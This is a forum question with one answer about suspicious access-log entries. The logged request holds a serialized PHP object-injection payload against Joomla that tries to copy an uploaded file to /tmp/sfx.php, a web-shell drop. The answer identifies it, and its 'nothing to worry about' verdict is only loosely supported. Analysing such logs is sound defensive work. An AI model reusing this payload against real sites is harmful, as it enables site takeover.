# Suspicious access log entries

Tags: security, log, access

Wondering if anyone can help with this. I've seen the following crop up in my access logs over a few days. It's generated a 301 response but i'm wondering if it's anything to be concerned about?

```
"GET / HTTP/1.1 "301 178 "-" "-"
"}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C
0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMys
ql\x22:0:{}s:8:\x22feed_url\x22;s:137:\x22print
copy($_FILES[file][tmp_name],dirname(JFactory::getConfig()->get(base64_decode(bG9nX3BhdGg))).base64_decode(L3RtcC9zZn
gucGhw));exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:
20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD
, 109.184.87.217"[RT:0.001] [C:15755346]
```

Answer (score 1):

I think this is nothing to worry about after some further digging. I created a php file just to show what was base64_decode'd and it shows log_path/tmp/sfx.php

From some research it looks like someone was
trying to see if the website is powered by Joomla and trying to exploit a security issue in the Joomla CMS;

https://krebsonsecurity.com/tag/sfx-php/
https://www.claudiokuenzler.com/blog/534/joomla-hacked-through-akeeba-backup-restore-joomlaupdate#.WgWFz7Bl-fg